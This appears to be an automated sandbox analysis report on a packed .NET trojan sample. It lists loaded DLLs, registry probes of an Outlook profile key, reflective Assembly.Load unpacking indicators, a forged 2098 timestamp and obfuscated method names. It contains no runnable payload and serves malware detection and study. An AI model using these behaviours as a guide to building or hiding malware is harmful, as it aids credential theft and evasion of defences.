Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: VZLk.pdb source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe
Source:	Binary string: VZLk.pdbSHA256 source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe, VentanaPrincipal.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.cs	.Net Code: GDYoY6nRE9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.cs	.Net Code: GDYoY6nRE9 System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.2501ae8.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24f56d0.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.24a6fe8.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.4f50000.6.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: 0xF223B00A [Wed Sep 24 19:24:58 2098 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_01699C30 push esp; retf 0309h	5_2_01699D55
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB2DBF pushfd ; retf	5_2_06DB2DC1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe	Code function: 5_2_06DB9241 push es; ret	5_2_06DB9244

Source: SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe

Static PE information: section name: .text entropy: 7.84421246743167

Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, by1Ra86qpBwqoF91TJf.cs	High entropy of concatenated method names: 'fM8Og6hIBe', 'K0DO4QPAdj', 'qK4OY1XuLv', 'TU8IAmilML3Cvq09K7n', 'yp40RxiqxAfHGaUOtIc', 'tDePL6i1SXHrcyWq2iV', 'n4MBB0iy0LIXKETcJtY', 'tP1U7riPdf17g649GIE', 'EjVMI1i4gBAwJHXBAxx'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VBxvRIJIqICbqLQou1.cs	High entropy of concatenated method names: 'rt5cycUnBE', 'JHFcP4o5wM', 'Ne5cXoXfWZ', 'kEjctFDdwo', 'zaJcB2iWyq', 'gsPcUUN8A8', 'ji1cdQ9NFZ', 'wfecChWhK8', 'NoZcafa1UA', 'dc5c3YXvUt'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, l1OtpJLerfqx2P3eYZ.cs	High entropy of concatenated method names: 'WPKtKEprC4', 'S2JtZmscPV', 'w8etILxYXd', 'vp7tfn121X', 'zTHt5YvR7i', 'fSLt1GZVwi', 'EHftvUXNNk', 'aEAtTYp8Cc', 'vFWtxkv1eG', 'qPetOjUxGG'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, kiI6p4BSVLG0pd5eAk.cs	High entropy of concatenated method names: 'eyp9IVDoAZ', 'ykF9f06urK', 'uDB9pSCGx7', 'zKY9Jmvp74', 'IlU9EMqQp6', 'TED9RVON8m', 'awt9bC7uhx', 'GYp9DqpxJP', 'mrA90BD7bf', 'Y279W1wj1s'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, VNjCJQFsQY5fJYmwZw.cs	High entropy of concatenated method names: 'EZNdgcR4Yp', 'anwd4XmUY6', 'p6xdY66Jx6', 'eVidKnBNa1', 'YSJdrEpVQr', 'BMMdZ2NlS5', 'Oird2KrUDI', 'PtJdIgTrXg', 'C30df0cLEF', 'vH3dwkQBs9'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, DqNgnqV4QAo9HR3WmW.cs	High entropy of concatenated method names: 'omH8xi0YvwWE6Cabsos', 'XHl3FW0CjbI3aL7qCtn', 'di2UTVHkIK', 'gNcUx9Gu15', 'eReUOixc1B', 'bbQhBi0JEtbd8rJqGme', 'TOC9U80mL9caqwEZBdI'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, JnFnlV2AkCEMjZr9N3.cs	High entropy of concatenated method names: 'vfVQdu5o0f', 'vkSQCVR8Qx', 'lD9Q3sAxSW', 'I63Qet1ok0', 'X6WQ5rUb47', 'eg8Q10J4jk', 'mE5wgDUDn9ev75SEr6', 'qxVPOHSreCrvnwybML', 'DowrvmX5q79v2LhCAj', 'eXcQQsRb3Q'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, lTJeWQahmC83W1frBy.cs	High entropy of concatenated method names: 'Dispose', 'q0sQmIPYDS', 'UQMFJVhBd0', 'BCXqqKG64O', 'llfQHfuhRD', 'BxoQzFCndj', 'ProcessDialogKey', 'L8gFVborqe', 'FLAFQOVmvK', 'Vc9FFZfRhK'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, P45isuhkRj9Njwq4ib.cs	High entropy of concatenated method names: 'd5JTpU690G', 'Ry8TJYQ5bV', 'hCFTuClJJb', 'ecdTEH1Amm', 'HG8TGoiVnC', 'jpJTRLl35a', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, xtAWKPr6SqZQ8SYDFI.cs	High entropy of concatenated method names: 'CocUynawPi', 'gR9UXsDvDP', 'bNxUByB4Xv', 'xDvUdMh7WR', 'SBXUCdNlHg', 'fCgBA47bPM', 'LbUBsyqVTN', 'OGGB8PqiE5', 'K9wBNTucQx', 'OvZBmMe48D'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, PwgejifBW1AQaoSbvl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hboFmqVjpW', 'l1IFHNU7Fq', 'c3JFzyo9gX', 'SrjcV1YEPi', 'wdHcQVIscA', 'DxocFFQ066', 'G3Wcc32LQR', 'yFBCxnO5RK3BQYJxd98'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, w5rAZQz7TDAhfnwhZh.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jR3x9DZ2TV', 'rlmx5Q6wvR', 'O16x1SJ6eB', 'jmVxv7oSLQ', 'rM2xTitGvA', 'MV4xx64aWI', 'nmaxOfRnLh'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, K7v8N7oaxfulbm8glp.cs	High entropy of concatenated method names: 'VIZXGrk133', 'ORDXi0q85p', 'JvkXkpdvCM', 'HAsX7yF6jE', 'vddXAy2y9I', 'GKcXstKDQx', 'gv4X8sdXVv', 'tenXNCjq3A', 'sYrXmUQXS9', 'IsKXHPHlPK'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, RsmbO4lPM3fqwAXXXZ.cs	High entropy of concatenated method names: 'xiaBrAXowm', 'X6OB2NDdBP', 'BMWtu1MiRS', 'SiRtERKaC5', 'EQgtR0Kokn', 'ysrtSi4iVZ', 'eWLtb59tmt', 'raxtDCeMMu', 'TUwtj81nNA', 'JqNt0rb309'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, h4n1sj5Mhy4vSTRFhG.cs	High entropy of concatenated method names: 'ToString', 'AZv1WrYspN', 'Gjo1J2kPC2', 'GOe1umJLND', 'Yjl1ELKYAX', 'yeA1RA7xGk', 'ukq1S6Mvbr', 'oFg1bi53PR', 'jGw1D9iYFI', 'YLb1jLl1Yf'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, letbS3snUWMQ0MEufm.cs	High entropy of concatenated method names: 'MSyTPTQnjw', 'FexTX2kgke', 'YBMTtI6Awk', 'lMATBqKH1i', 'u5FTU8E52G', 'MHkTdjQya5', 'RyTTCfIpYb', 'amOTawyA13', 'xdiT3cRuy8', 'rHJTeFZaad'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, RdpeJIxDSTHnH9WxuL.cs	High entropy of concatenated method names: 'gWjvNF29IC', 'FTxvHsPUpb', 'EesTVEqYkS', 'IljTQaLYJG', 'SXovWaJfYc', 'YWdvlOlqOr', 'RZHvLf0x67', 'ndZvG1yhUO', 'ccdvixaxZt', 'LR0vkR6AGv'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, iwyL5GvBkUYcPkFRHy.cs	High entropy of concatenated method names: 'NEWdPc3r8h', 'AJ8dtpFU9t', 'zDMdUmp0HV', 'zjYUHmmDI0', 'PgnUzDVR4j', 'TPwdVlMf6S', 'yTrdQ83rrl', 'X46dF76V99', 'qOUdcDVdyG', 'EARdovqrgu'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, sn8T3eqEZoYykx8cPF.cs	High entropy of concatenated method names: 'utUYpwo06', 'xuPKm0IR9', 'fkQZehJOk', 'rYE258lRL', 'TwhfyQhKL', 'st3w1IXsU', 'XvrYba1AOireYOLo7n', 'UBubUAlvZ1lFUAdlFF', 'P95TtkgE7', 'EkRO0Scvd'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, H85CDsAEXTxa2kUmrN.cs	High entropy of concatenated method names: 'PjYxQ9VqwN', 'KfWxcmB3hk', 'boHxoZEQme', 'MaTxPdJCBl', 'sP4xXPxE1E', 'A4xxBarKWO', 'IZxxUG1T1w', 'yoPT8F9L0t', 'VrcTNLJPsh', 'MaITmpqXld'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, WnD0OZ69l1ff1c0ugFq.cs	High entropy of concatenated method names: 'XiCxgPse39', 'nMpx4k1gjN', 'fI3xYBUp2D', 'BdGxKCM0Nv', 'uoQxrxGKNf', 'yDXxZrg0ZH', 'm5sx2qJbQP', 'M3VxIwkDFd', 'uYmxfIPbO9', 'ttZxwdWm0K'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.93a0000.7.raw.unpack, aivdY56SnFUlwKJRc43.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tPdOGB5oR4', 'd2SOicxY6E', 'TkTOkNruY6', 'yQ6O7pmOhy', 'dLVOAvfsE5', 'ALmOsSEU0b', 'o9DO80MQ4m'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, by1Ra86qpBwqoF91TJf.cs	High entropy of concatenated method names: 'fM8Og6hIBe', 'K0DO4QPAdj', 'qK4OY1XuLv', 'TU8IAmilML3Cvq09K7n', 'yp40RxiqxAfHGaUOtIc', 'tDePL6i1SXHrcyWq2iV', 'n4MBB0iy0LIXKETcJtY', 'tP1U7riPdf17g649GIE', 'EjVMI1i4gBAwJHXBAxx'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VBxvRIJIqICbqLQou1.cs	High entropy of concatenated method names: 'rt5cycUnBE', 'JHFcP4o5wM', 'Ne5cXoXfWZ', 'kEjctFDdwo', 'zaJcB2iWyq', 'gsPcUUN8A8', 'ji1cdQ9NFZ', 'wfecChWhK8', 'NoZcafa1UA', 'dc5c3YXvUt'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, l1OtpJLerfqx2P3eYZ.cs	High entropy of concatenated method names: 'WPKtKEprC4', 'S2JtZmscPV', 'w8etILxYXd', 'vp7tfn121X', 'zTHt5YvR7i', 'fSLt1GZVwi', 'EHftvUXNNk', 'aEAtTYp8Cc', 'vFWtxkv1eG', 'qPetOjUxGG'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, kiI6p4BSVLG0pd5eAk.cs	High entropy of concatenated method names: 'eyp9IVDoAZ', 'ykF9f06urK', 'uDB9pSCGx7', 'zKY9Jmvp74', 'IlU9EMqQp6', 'TED9RVON8m', 'awt9bC7uhx', 'GYp9DqpxJP', 'mrA90BD7bf', 'Y279W1wj1s'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, VNjCJQFsQY5fJYmwZw.cs	High entropy of concatenated method names: 'EZNdgcR4Yp', 'anwd4XmUY6', 'p6xdY66Jx6', 'eVidKnBNa1', 'YSJdrEpVQr', 'BMMdZ2NlS5', 'Oird2KrUDI', 'PtJdIgTrXg', 'C30df0cLEF', 'vH3dwkQBs9'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, DqNgnqV4QAo9HR3WmW.cs	High entropy of concatenated method names: 'omH8xi0YvwWE6Cabsos', 'XHl3FW0CjbI3aL7qCtn', 'di2UTVHkIK', 'gNcUx9Gu15', 'eReUOixc1B', 'bbQhBi0JEtbd8rJqGme', 'TOC9U80mL9caqwEZBdI'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, JnFnlV2AkCEMjZr9N3.cs	High entropy of concatenated method names: 'vfVQdu5o0f', 'vkSQCVR8Qx', 'lD9Q3sAxSW', 'I63Qet1ok0', 'X6WQ5rUb47', 'eg8Q10J4jk', 'mE5wgDUDn9ev75SEr6', 'qxVPOHSreCrvnwybML', 'DowrvmX5q79v2LhCAj', 'eXcQQsRb3Q'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, lTJeWQahmC83W1frBy.cs	High entropy of concatenated method names: 'Dispose', 'q0sQmIPYDS', 'UQMFJVhBd0', 'BCXqqKG64O', 'llfQHfuhRD', 'BxoQzFCndj', 'ProcessDialogKey', 'L8gFVborqe', 'FLAFQOVmvK', 'Vc9FFZfRhK'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, P45isuhkRj9Njwq4ib.cs	High entropy of concatenated method names: 'd5JTpU690G', 'Ry8TJYQ5bV', 'hCFTuClJJb', 'ecdTEH1Amm', 'HG8TGoiVnC', 'jpJTRLl35a', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, xtAWKPr6SqZQ8SYDFI.cs	High entropy of concatenated method names: 'CocUynawPi', 'gR9UXsDvDP', 'bNxUByB4Xv', 'xDvUdMh7WR', 'SBXUCdNlHg', 'fCgBA47bPM', 'LbUBsyqVTN', 'OGGB8PqiE5', 'K9wBNTucQx', 'OvZBmMe48D'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, PwgejifBW1AQaoSbvl.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'hboFmqVjpW', 'l1IFHNU7Fq', 'c3JFzyo9gX', 'SrjcV1YEPi', 'wdHcQVIscA', 'DxocFFQ066', 'G3Wcc32LQR', 'yFBCxnO5RK3BQYJxd98'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, w5rAZQz7TDAhfnwhZh.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jR3x9DZ2TV', 'rlmx5Q6wvR', 'O16x1SJ6eB', 'jmVxv7oSLQ', 'rM2xTitGvA', 'MV4xx64aWI', 'nmaxOfRnLh'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, K7v8N7oaxfulbm8glp.cs	High entropy of concatenated method names: 'VIZXGrk133', 'ORDXi0q85p', 'JvkXkpdvCM', 'HAsX7yF6jE', 'vddXAy2y9I', 'GKcXstKDQx', 'gv4X8sdXVv', 'tenXNCjq3A', 'sYrXmUQXS9', 'IsKXHPHlPK'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, RsmbO4lPM3fqwAXXXZ.cs	High entropy of concatenated method names: 'xiaBrAXowm', 'X6OB2NDdBP', 'BMWtu1MiRS', 'SiRtERKaC5', 'EQgtR0Kokn', 'ysrtSi4iVZ', 'eWLtb59tmt', 'raxtDCeMMu', 'TUwtj81nNA', 'JqNt0rb309'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, h4n1sj5Mhy4vSTRFhG.cs	High entropy of concatenated method names: 'ToString', 'AZv1WrYspN', 'Gjo1J2kPC2', 'GOe1umJLND', 'Yjl1ELKYAX', 'yeA1RA7xGk', 'ukq1S6Mvbr', 'oFg1bi53PR', 'jGw1D9iYFI', 'YLb1jLl1Yf'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, letbS3snUWMQ0MEufm.cs	High entropy of concatenated method names: 'MSyTPTQnjw', 'FexTX2kgke', 'YBMTtI6Awk', 'lMATBqKH1i', 'u5FTU8E52G', 'MHkTdjQya5', 'RyTTCfIpYb', 'amOTawyA13', 'xdiT3cRuy8', 'rHJTeFZaad'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, RdpeJIxDSTHnH9WxuL.cs	High entropy of concatenated method names: 'gWjvNF29IC', 'FTxvHsPUpb', 'EesTVEqYkS', 'IljTQaLYJG', 'SXovWaJfYc', 'YWdvlOlqOr', 'RZHvLf0x67', 'ndZvG1yhUO', 'ccdvixaxZt', 'LR0vkR6AGv'
Source: 0.2.SecuriteInfo.com.Trojan.Packed2.48025.4038.12608.exe.37256c0.5.raw.unpack, iwyL5GvBkUYcPkFRHy.cs	High entropy of concatenated method names: 'NEWdPc3r8h', 'AJ8dtpFU9t', 'zDMdUmp0HV', 'zjYUHmmDI0', 'PgnUzDVR4j', 'TPwdVlMf6S', 'yTrdQ83rrl', 'X46dF76V99', 'qOUdcDVdyG', 'EARdovqrgu'
